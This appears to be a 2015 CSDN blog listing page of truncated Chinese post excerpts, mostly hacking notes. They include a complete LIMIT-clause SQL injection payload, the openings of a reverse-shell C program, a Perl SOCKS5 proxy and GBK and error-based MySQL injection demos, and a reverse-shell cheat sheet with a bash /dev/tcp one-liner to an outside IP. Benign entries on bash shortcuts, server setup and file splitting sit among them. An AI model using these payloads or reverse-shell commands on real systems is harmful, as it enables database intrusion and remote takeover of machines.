COMDCOMD456789-优快云博客

原创爬取页面

import urllib2 import math for line in open('d.html'): req = urllib2.Request('http://www.wooyun.org'+line.strip()) cookie='share_firstime=1423041834739; '; req.add_header('Cookie', c...

2015-08-28 13:46:55 176

原创 limit注入

page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23

2015-07-07 21:50:53 225

原创大文件上传

压缩文件 tar czvf my.tar.gz dir1 dir2 分割 split -b 100m(k) filename outfilenmae cat filename1,fi...>my.tar.gz tar zxvf

2015-06-16 10:09:32 192

http://www.ip2location.com/free/visitor-blocker Debian or Ubuntu: sudo apt-get install build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flex Red Hat Enterprise Linux or CentOS: sudo yu...

2015-06-16 10:08:31 818

原创 C版设置源端口反弹程序

#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> void error(char *msg) { perror(msg); ...

2015-06-12 14:37:17 189

原创 perl版socks5代理

#!/usr/bin/perl $auth_enabled = 0; $auth_login = "hidden"; $auth_pass = "hidden"; $port = 44269; use IO::Socket::INET; $SIG{'CHLD'} = 'IGNORE'; $bind = IO::Socket::INET->new(Listen=>10, Reus...

2015-06-12 14:35:58 14348

原创 gbk双字节注入

<?php //连接数据库部分，注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败，未找到您填写的数据库");...

2015-06-12 14:34:22 406

原创 mysql暴错注入

mysql的一个bug http://bugs.mysql.com/bug.php?id=8652 重现过程 use mysql; create table r1 (a int); insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2); select left(rand(),3)...

2015-06-12 14:30:52 194

原创编译php模块

wget http://am1.php.net/distributions/php-5.3.28.tar.gz tar zxvf php-5.3.28.tar.gz cd php-5.3.28 cd ext ./ext_skel --extname=shell cd shell vi config.m4 vi shell.c phpize ...

2015-06-12 14:27:09 135

原创安装lnmp

wget -c http://soft.vpser.net/lnmp/lnmp1.0-full.tar.gz && tar zxvf lnmp1.0-full.tar.gz && cd lnmp1.0-full当然上面的soft.vpser.net也可以替换为离你近的镜像节点。下面以主镜像替换为soft2镜像为例如果是centos的系统，再执行：sed -i ...

2015-06-11 09:32:41 120

原创各种语言反弹shell

Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL Here’s a shorter, feature-free version of the perl-revers...

2015-06-11 09:30:57 339

原创 bash快捷键

Ctrl + a 切换到命令行开始 Ctrl + e 切换到命令行末尾 Ctrl + l 清除屏幕内容，效果等同于clear Ctrl + u 清除剪切光标之前的内容 Ctrl + k 剪切清除光标之后的内容 Ctrl + y 粘贴刚才所删除的字符 Ctrl + r 在历史命令中查找 Ctrl + c 终止命令 Ctrl + d 退出shell，logout Ctrl + z ...

2015-06-11 09:27:43 154

原创修改DNS探测网站

service nscd stop #!/bin/bash a=`date +%F-%H-%M`; while read LINE; do sed -i "1s/^.*$/$LINE/" /etc/hosts; mkdir /home/webscan/logs/$a; wget www.xxx.com -O /home...

2015-06-11 09:25:11 193